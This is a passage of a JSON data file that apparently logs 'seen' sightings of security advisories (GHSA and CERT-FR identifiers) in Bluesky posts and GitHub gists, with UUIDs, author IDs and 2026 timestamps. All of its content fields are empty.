"https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mjdsgasnsf2d", "content": "", "creation_timestamp": "2026-04-13T02:18:18.020862Z"}, {"uuid": "2644e69d-a900-48bf-ad2e-bc16d9cd4636", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2679-6mx9-h9xc", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mjdsgat6ar2a", "content": "", "creation_timestamp": "2026-04-13T02:18:17.488186Z"}, {"uuid": "7a81cce4-de99-48a0-b365-72af8bb6281c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f5h9-5q52-qrx7", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mjgeksrnu42l", "content": "", "creation_timestamp": "2026-04-14T02:48:17.735420Z"}, {"uuid": "faec30c3-21ba-43a2-ad93-2770628dca70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mjgeksnsw626", "content": "", "creation_timestamp": "2026-04-14T02:48:17.239677Z"}, {"uuid": "1715faa8-fb81-404b-950f-2f3fb7fb23cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f55j-vvr9-69xv", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3mk3m2g4qor22", "content": "", "creation_timestamp": "2026-04-22T13:28:12.027487Z"}, {"uuid": "994aad22-9eee-4fc7-bb77-946718847ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/topickapp.bsky.social/post/3mjgl6iqrmn2p", "content": "", "creation_timestamp": "2026-04-14T04:46:40.107721Z"}, {"uuid": "671051df-01dc-4b83-bad2-3762c181d6bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f55j-vvr9-69xv", "type": "seen", "source": "https://bsky.app/profile/sofia.bottom.business.ap.brid.gy/post/3mk3wb4ms63m2", "content": "", "creation_timestamp": "2026-04-22T16:30:57.660043Z"}, {"uuid": "35168733-475b-44bd-9394-3d4c5b120f70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mk5xnhyzsk2o", "content": "", "creation_timestamp": "2026-04-23T12:01:01.629547Z"}, {"uuid": "ab3d74ac-c8c1-4df0-8357-2d02b4038a2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m4g2-2q66-vc9v", "type": "seen", "source": "https://gist.github.com/alon710/7c1594c342afa1e0cba4cf7371023f4c", "content": "", "creation_timestamp": "2026-02-11T23:10:05.000000Z"}, {"uuid": "0665934e-d107-4ffa-ac9c-06a76ab44676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ff64-7w26-62rf", "type": "seen", "source": "https://gist.github.com/alon710/51a0c55d4dbb7e259a8444e158c05d3a", "content": "", "creation_timestamp": "2026-02-06T19:40:05.000000Z"}, {"uuid": "6bb70a90-f7e1-48b8-9ebb-5265f329355c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ff9r-ww9c-43x8", "type": "seen", "source": "https://gist.github.com/alon710/b5bcbf27e83e870132cea62ff4e8259e", "content": "", "creation_timestamp": "2026-02-11T23:40:05.000000Z"}, {"uuid": "f97144cb-4bd9-4da1-a8bf-b90d23d722c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-006", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3megrjvyvr62t", "content": "", "creation_timestamp": "2026-02-09T15:34:27.143314Z"}, {"uuid": "28730dfc-261a-4685-a28a-08872e575d31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vph-2hvm-x66g", "type": "seen", "source": "https://gist.github.com/alon710/03f3dd771bb5d3bbd35120e8ce57c5b1", "content": "", "creation_timestamp": "2026-02-10T00:40:05.000000Z"}, {"uuid": "9e8add38-2f78-4aa5-90e9-a8f6b986a976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v226-32c7-x2v7", "type": "seen", "source": "https://gist.github.com/alon710/b5fe90df3763874f070b682a26b7b53b", "content": "", "creation_timestamp": "2026-02-10T01:10:06.000000Z"}, {"uuid": "c0dadb91-e65e-485b-8411-b5f1ed4d3f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGR2-R5HM-F6GF", "type": "seen", "source": "https://gist.github.com/alon710/7c0895fc5cfa0dbbdce43149aea16d24", "content": "", "creation_timestamp": "2026-02-13T10:10:39.000000Z"}, {"uuid": "d55f9d20-c8ac-4d37-8118-0d26e68f66df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68m5-5w2h-h837", "type": "seen", "source": "https://gist.github.com/alon710/61f36e3e2a848466e0e5c8053e479e6f", "content": "", "creation_timestamp": "2026-02-10T01:40:05.000000Z"}, {"uuid": "d8835608-c5a2-404f-bfc5-5ef4fd12871f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37cx-329c-33x3", "type": "seen", "source": "https://gist.github.com/alon710/a0764eb20d9f8956650b2167c18e15c7", "content": "", "creation_timestamp": "2026-02-10T02:10:05.000000Z"}, {"uuid": "b4eec190-75b2-44de-b018-9702e9d834a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c869-jx4c-q5fc", "type": "seen", "source": "https://gist.github.com/alon710/fb457bfeef78c9056a7ced2406cd4503", "content": "", "creation_timestamp": "2026-02-10T02:40:05.000000Z"}, {"uuid": "eb2834ad-1f00-4f2a-a292-f4179c1afbe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68rr-p4fp-j59v", "type": "seen", "source": "https://gist.github.com/alon710/5af375aaa90ee81593b681d701613e87", "content": "", "creation_timestamp": "2026-02-09T18:40:05.000000Z"}, {"uuid": "8c310fa2-efde-4b58-a055-ad004fb53a57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cpmj-h4f6-r6pq", "type": "seen", "source": "https://gist.github.com/alon710/e85ad061ffeeca5a8b4df6461e22b9df", "content": "", "creation_timestamp": "2026-02-09T19:10:07.000000Z"}, {"uuid": "067ff544-0ada-4d03-b37d-f362d288d436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6x6-9mx6-26wj", "type": "seen", "source": "https://gist.github.com/alon710/4df0dc54735b275488bf3aa51c4b4e68", "content": "", "creation_timestamp": "2026-02-06T18:10:05.000000Z"}, {"uuid": "afd5f0f9-81fa-496c-acfa-18a315e94326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4p5-w6r3-2x4f", "type": "seen", "source": "https://gist.github.com/alon710/342949282eb9c73531dd21d7ba1dbd82", "content": "", "creation_timestamp": "2026-02-10T03:10:06.000000Z"}, {"uuid": "7fcb2103-360c-4cdf-8f29-501a5e9dd41f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg64-xxr9-qhjp", "type": "seen", "source": "https://gist.github.com/alon710/98338210f5bd9ada35f70b193f4ec636", "content": "", "creation_timestamp": "2026-02-10T03:10:05.000000Z"}, {"uuid": "925d1358-87b0-407b-a7ae-9075a3dbd93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7ppg-37fh-vcr6", "type": "seen", "source": "https://gist.github.com/alon710/5cd6606175d5ceb9195cb6dbaed696ec", "content": "", "creation_timestamp": "2026-02-11T22:40:05.000000Z"}, {"uuid": "a9eb3a72-0f7b-430d-b2b9-b9ee596bac86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2g6r-c272-w58r", "type": "seen", "source": "https://gist.github.com/alon710/b7718721e42a4105b8dafaad68d6c90c", "content": "", "creation_timestamp": "2026-02-11T14:40:05.000000Z"}, {"uuid": "d0200995-3e95-4aff-804b-5733eb011c9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r3xh-3r3w-47gp", "type": "seen", "source": "https://gist.github.com/alon710/e1fca2fe758f5ed455faeb6f5f564e1d", "content": "", "creation_timestamp": "2026-02-12T21:10:24.000000Z"}, {"uuid": "ea3a544d-1f12-4278-8c15-494b1f28f578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-px4r-g4p3-hhqv", "type": "seen", "source": "https://gist.github.com/alon710/d01a7eedfc71c05885cd1abab59c3272", "content": "", "creation_timestamp": "2026-02-12T21:40:23.000000Z"}, {"uuid": "5fee34d9-508d-4c9e-b93e-ffdd1050aeb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6x7-jq8p-6q9q", "type": "seen", "source": "https://gist.github.com/alon710/55922433a77df7de86cea2e1123888c8", "content": "", "creation_timestamp": "2026-02-12T22:10:25.000000Z"}, {"uuid": "4c3e7cdc-d2e1-410f-9d1f-2f575b0cf769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr94-gj3h-c8rf", "type": "seen", "source": "https://gist.github.com/alon710/416bd4c6e882d4c4ca94fe2714e150bc", "content": "", "creation_timestamp": "2026-02-12T22:40:23.000000Z"}, {"uuid": "7bfe9ead-fb76-44bd-be72-118d68109da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2ww3-72rp-wpp4", "type": "seen", "source": "https://gist.github.com/alon710/52261fea2d6335abf9dd90d11344bc38", "content": "", "creation_timestamp": "2026-02-09T08:10:05.000000Z"}, {"uuid": "ef0e97d9-4641-4352-bb1c-a75ee537be5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-435G-FCV3-8J26", "type": "seen", "source": "https://gist.github.com/alon710/b39938f3d43a4854f3d6fd693d202b4e", "content": "", "creation_timestamp": "2026-02-12T23:10:24.000000Z"}, {"uuid": "86f1b63b-5e82-40f2-baa4-5c783face368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R33W-FG8J-9C94", "type": "seen", "source": "https://gist.github.com/alon710/b4af75c9cfe16c4941f27d2dd9ef14bc", "content": "", "creation_timestamp": "2026-02-13T00:40:24.000000Z"}, {"uuid": "b7de9328-471b-42b4-92a6-27c073b684ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX7M-69FF-9CRP", "type": "seen", "source": "https://gist.github.com/alon710/db853e0a605e11003bf240d589bebc01", "content": "", "creation_timestamp": "2026-02-13T01:10:24.000000Z"}, {"uuid": "fc5c319d-05e2-49d7-92c1-6e6ed93a91fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CHM2-M3W2-WCXM", "type": "seen", "source": "https://gist.github.com/alon710/49fe7932db7265ff1ca29766f0feec28", "content": "", "creation_timestamp": "2026-02-17T23:10:30.000000Z"}, {"uuid": "3e3a74c0-6b4b-469a-97a3-aeab0db3c549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V6C6-VQQG-W888", "type": "seen", "source": "https://gist.github.com/alon710/c1dd925bfef757917be700332b8feba8", "content": "", "creation_timestamp": "2026-02-18T01:10:31.000000Z"}, {"uuid": "b1a2a879-fe75-4beb-9579-50c669c123d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5XFQ-5MR7-426Q", "type": "seen", "source": "https://gist.github.com/alon710/d996dd0c6e7f9ea84de3ae6decf3247e", "content": "", "creation_timestamp": "2026-02-18T02:10:30.000000Z"}, {"uuid": "e8bab448-78ef-47f3-90ca-20f85e9daee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5c7-9qqw-6645", "type": "seen", "source": "https://gist.github.com/alon710/3427c45f512613181709349503975f7b", "content": "", "creation_timestamp": "2026-02-18T02:40:31.000000Z"}, {"uuid": "920bcdaa-0ac4-4077-a23b-eebca030fb95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JQPQ-MGVM-F9R6", "type": "seen", "source": "https://gist.github.com/alon710/987ca5bdabf9a36f6f14f8fab00607ac", "content": "", "creation_timestamp": "2026-02-18T03:10:31.000000Z"}, {"uuid": "9cc87169-b656-444f-94dc-79ec17a07cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JQPQ-MGVM-F9R6", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mf44wwkkcf42", "content": "", "creation_timestamp": "2026-02-18T03:24:30.836879Z"}, {"uuid": "dc0bc364-23ec-41b2-9135-a9b9b20d3310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-jqpq-mgvm-f9r6", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mf457x2h2v2s", "content": "", "creation_timestamp": "2026-02-18T03:29:33.467874Z"}, {"uuid": "1b044d9f-8e0c-4387-9df3-84cc983b60e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pg2v-8xwh-qhcc", "type": "seen", "source": "https://gist.github.com/alon710/5c7f7833fd0ad159c05563c2efb45e73", "content": "", "creation_timestamp": "2026-02-18T03:40:31.000000Z"}, {"uuid": "c5c7e1f4-8c6b-4c91-bb83-f2a39dfebf1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-pg2v-8xwh-qhcc", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mf46mnjtkx2s", "content": "", "creation_timestamp": "2026-02-18T03:54:32.415517Z"}, {"uuid": "7db28d00-40c7-4da1-b69b-eccdf304feb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C37P-4QQG-3P76", "type": "seen", "source": "https://gist.github.com/alon710/d4b54418f1ac4f55847b5f5ea78c536b", "content": "", "creation_timestamp": "2026-02-18T04:20:30.000000Z"}, {"uuid": "6071e924-7693-4086-b764-182cb93531c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PG2V-8XWH-QHCC", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mf4apwkryb62", "content": "", "creation_timestamp": "2026-02-18T04:32:17.362002Z"}, {"uuid": "e0622ba6-0382-4b60-9b97-6c1790e36536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mj5r-hh7j-4gxf", "type": "seen", "source": "https://gist.github.com/alon710/b0c0c3586861dd047e116007334a6181", "content": "", "creation_timestamp": "2026-02-18T04:40:30.000000Z"}, {"uuid": "a6b73786-806c-4cae-87ee-e1364b98300d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQ6G-PX6M-C248", "type": "seen", "source": "https://gist.github.com/alon710/5f804885677a1bd81a0133a8ac4995b2", "content": "", "creation_timestamp": "2026-02-18T05:10:31.000000Z"}, {"uuid": "5f9484bc-0769-40e4-ae71-431bb60933ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-Q447-RJ3R-2CGH", "type": "seen", "source": "https://gist.github.com/alon710/00067d90a2461fbca1a5464c0bbbd63b", "content": "", "creation_timestamp": "2026-02-18T06:40:30.000000Z"}, {"uuid": "019f6d78-406a-4289-ac1e-e2b37f4fb8e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h89v-j3x9-8wqj", "type": "seen", "source": "https://gist.github.com/alon710/e76a508d42a933b6e0e4ae7a1f22b0f7", "content": "", "creation_timestamp": "2026-02-18T07:10:30.000000Z"}, {"uuid": "45de9517-8e7b-465c-91cf-84f5dfe7a06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W2CG-VXX6-5XJG", "type": "seen", "source": "https://gist.github.com/alon710/b32486c93c616bdc2ae10d8c688353c3", "content": "", "creation_timestamp": "2026-02-18T07:40:30.000000Z"}, {"uuid": "dd052bae-3694-4aa7-a93a-9e3ab579d170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j27p-hq53-9wgc", "type": "seen", "source": "https://gist.github.com/alon710/e6f79cdbd45ffed4bc877651bc55bea4", "content": "", "creation_timestamp": "2026-02-18T08:10:30.000000Z"}, {"uuid": "12d2eaa4-e5e5-4744-832e-3141f173a530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V773-R54F-Q32W", "type": "seen", "source": "https://gist.github.com/alon710/e0846924a076743365a6367e44be09a4", "content": "", "creation_timestamp": "2026-02-18T08:40:31.000000Z"}, {"uuid": "c8e390b5-9837-46af-a7c3-5fa36021b0ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XVHF-X56F-2HPP", "type": "seen", "source": "https://gist.github.com/alon710/76cd3f1beb1ab2ec1fdc813eaacbfc51", "content": "", "creation_timestamp": "2026-02-18T09:10:30.000000Z"}, {"uuid": "20928e9e-f489-4a5f-9a4c-c821bffe9427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-97F8-7CMV-76J2", "type": "seen", "source": "https://gist.github.com/alon710/7d358b16d25392353f6ef386192b3088", "content": "", "creation_timestamp": "2026-02-18T18:10:40.000000Z"}, {"uuid": "ef61576c-239c-47b8-af40-e804d452e95c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H9G4-589H-68XV", "type": "seen", "source": "https://gist.github.com/alon710/844fd31d09ce1f0bffd3bf36057f5d6f", "content": "", "creation_timestamp": "2026-02-18T18:40:39.000000Z"}, {"uuid": "64158e95-a3c0-4515-ac8a-8f81f5b1a50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X22M-J5QQ-J49M", "type": "seen", "source": "https://gist.github.com/alon710/482912f82ba4201d8ab50a46212af3c4", "content": "", "creation_timestamp": "2026-02-18T19:10:39.000000Z"}, {"uuid": "83c15c4d-812b-437e-800a-7f22d0c2b7ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RWJ8-P9VQ-25GV", "type": "seen", "source": "https://gist.github.com/alon710/1e6afb3840077f77e3f5cee7a373c3eb", "content": "", "creation_timestamp": "2026-02-18T19:40:40.000000Z"}, {"uuid": "fb70904b-a29c-44c1-9368-1eabbbc076cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JFV4-H8MC-JCP8", "type": "seen", "source": "https://gist.github.com/alon710/46d127cf3a2094bb829e405b76bec24c", "content": "", "creation_timestamp": "2026-02-18T20:10:40.000000Z"}, {"uuid": "4059ecb1-14e6-4435-b634-8264ad622144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7RCP-MXPQ-72PJ", "type": "seen", "source": "https://gist.github.com/alon710/2c65b9c465b98e060e5d00554406c73c", "content": "", "creation_timestamp": "2026-02-18T20:40:39.000000Z"}, {"uuid": "dfc17a02-0b02-4679-8283-1a1025b34a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4564-PVR2-QQ4H", "type": "seen", "source": "https://gist.github.com/alon710/8ad6d87be4b20c87d4ffa6ab748f3c93", "content": "", "creation_timestamp": "2026-02-18T21:10:40.000000Z"}, {"uuid": "455c3680-6d6f-42f2-af1e-ab3e640b101d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m3r8-8g46-qj66", "type": "seen", "source": "https://gist.github.com/alon710/c30b614b2f8b58329464819257a9bb07", "content": "", "creation_timestamp": "2026-02-18T23:10:39.000000Z"}, {"uuid": "1d81e401-543e-429f-a788-08ace46affbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67pg-wm7f-q7fj", "type": "seen", "source": "https://gist.github.com/alon710/86f2010f95e1888c6563e383610463a2", "content": "", "creation_timestamp": "2026-02-19T15:40:40.000000Z"}, {"uuid": "88ab3722-9332-4223-b8bf-b9aef9e0a767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wwj6-vghv-5p64", "type": "seen", "source": "https://gist.github.com/alon710/190b52f5cf2955da46507c2a49f7b03c", "content": "", "creation_timestamp": "2026-02-19T16:10:40.000000Z"}, {"uuid": "01f8ced3-595a-40ed-b733-63d17560ffa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3288-P39F-RQPV", "type": "seen", "source": "https://gist.github.com/alon710/8c42b8a9cef1366e5fae78d8762152a9", "content": "", "creation_timestamp": "2026-02-19T16:40:40.000000Z"}, {"uuid": "9d18a687-87c9-4592-be4d-621f2f2a93df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9ppg-jx86-fqw7", "type": "seen", "source": "https://gist.github.com/alon710/7522c30fea1d97914f8cc887eb8aaf04", "content": "", "creation_timestamp": "2026-02-19T17:10:40.000000Z"}, {"uuid": "e3614df4-72c2-42f4-9e9a-56a3fc8a6174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-9ppg-jx86-fqw7", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfa5anzvrs2t", "content": "", "creation_timestamp": "2026-02-19T17:40:35.619552Z"}, {"uuid": "df10df79-ddaa-4f59-b68a-397076ad1aa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FH3F-Q9QW-93J9", "type": "seen", "source": "https://gist.github.com/alon710/85b1f7a719954f294f29981a82d63310", "content": "", "creation_timestamp": "2026-02-19T20:10:40.000000Z"}, {"uuid": "0aae0b42-7534-4863-a6bc-e52c0c825d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88qp-p4qg-rqm6", "type": "seen", "source": "https://gist.github.com/alon710/7f0b026aa3cc9fd728c23b8682ac26d2", "content": "", "creation_timestamp": "2026-02-19T20:40:40.000000Z"}, {"uuid": "ce04f09b-d984-4963-888b-3b33597762c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r5fq-947m-xm57", "type": "seen", "source": "https://gist.github.com/alon710/94bb1111ad5890a0bbe92eb40656a6be", "content": "", "creation_timestamp": "2026-02-19T21:40:40.000000Z"}, {"uuid": "91be465d-6f1d-4ea1-a98f-edc0e7b407f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VRHM-GVG7-FPCF", "type": "seen", "source": "https://gist.github.com/alon710/bdb71500cdcbca966a4ff1f078991fa5", "content": "", "creation_timestamp": "2026-02-19T22:10:39.000000Z"}, {"uuid": "9d7f40a2-cab6-4225-a96a-be13a334d853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wfqv-66vq-46rm", "type": "seen", "source": "https://gist.github.com/alon710/ee16e9aabb8895513a00d88d6dc1ac96", "content": "", "creation_timestamp": "2026-02-19T22:40:39.000000Z"}, {"uuid": "1d66ea7e-a69c-4e35-b8c2-6298f84ee197", 